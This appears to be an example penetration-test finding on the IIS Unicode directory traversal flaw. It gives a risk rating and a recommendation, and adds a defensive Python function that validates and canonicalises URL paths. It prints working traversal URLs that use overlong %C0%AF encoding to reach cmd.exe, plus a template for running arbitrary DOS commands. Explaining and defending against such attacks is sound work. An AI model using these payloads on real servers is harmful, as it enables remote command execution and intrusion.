
Example Web server vulnerabilities (directory traversal)
 

Finding:

Unicode based Directory Traversal Vulnerability

Risk:

High

Explanation:

Typically, directory traversal involves Unicode-encoded strings or conventional character sequences such as "/../".
 

http://public.samplesite.co.uk:80/_vti_bin/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+dir

https://main.samplesite.co.uk:443/_vti_bin/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+dir
 

The exploit is formatted in the following way:


http://10.0.0.1/.../
http://10.0.0.1/.../.../directory/cmd.exe?c+[dos command]
 

Recommendation:

Patch the webserver to IIS 5.0.

Comments:

Directory traversal is a major vulnerability that is solved by patching servers correctly. There are few application-level solutions, although piping all form submissions and URL submissions through a single validation object may help.
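
One way to build the single validation object mentioned above, as an added example that is not part of the original finding or of any LODOGA tooling. The names validate_request_path, PathRejected and check are hypothetical, and the sample paths are constructed except the first, which is the path from the URLs in this finding. The check relies on strict UTF-8 decoding, which refuses the byte pair C0 AF because it is an overlong encoding of "/".

```python
import re
from urllib.parse import unquote_to_bytes

class PathRejected(ValueError):
    """Raised when a request path fails the canonicalisation checks."""

_RESIDUAL_ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")

def validate_request_path(raw_path: str) -> str:
    """Decode a URL path exactly once, strictly, and return its canonical form."""
    try:
        # Strict UTF-8 rejects overlong forms such as C0 AF (an alias of "/").
        decoded = unquote_to_bytes(raw_path).decode("utf-8", errors="strict")
    except UnicodeDecodeError as exc:
        raise PathRejected(f"invalid or overlong UTF-8 in path: {exc.reason}") from exc
    if _RESIDUAL_ESCAPE.search(decoded):
        # A second layer of escapes would be decoded by some later component.
        raise PathRejected("path is percent-encoded more than once")
    if "\\" in decoded or "\x00" in decoded:
        raise PathRejected("backslash or NUL byte in path")
    if not decoded.startswith("/"):
        raise PathRejected("path must be absolute")
    segments = decoded.split("/")
    if any(seg == ".." for seg in segments):
        raise PathRejected("parent-directory segment in path")
    # Collapse empty and "." segments so later code sees one canonical form.
    return "/" + "/".join(s for s in segments if s not in ("", "."))

def check(raw_path: str) -> str:
    """Return 'ALLOW <path>' or 'REJECT <reason>', suitable for a log line."""
    try:
        return "ALLOW " + validate_request_path(raw_path)
    except PathRejected as exc:
        return f"REJECT {exc}"

# Constructed sample inputs; the first is the path from the finding above.
SAMPLES = [
    "/_vti_bin/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe",
    "/docs/%2e%2e/%2e%2e/secret.txt",
    "/docs/..%252f..%252fsecret.txt",
    "/docs/./reports//2007%20summary.html",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:70} -> {check(sample)}")
```

Every handler should receive only the string this function returns, never the raw request path, so that validation and file-system access see the same decoded form.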


(c) LODOGA Limited 2007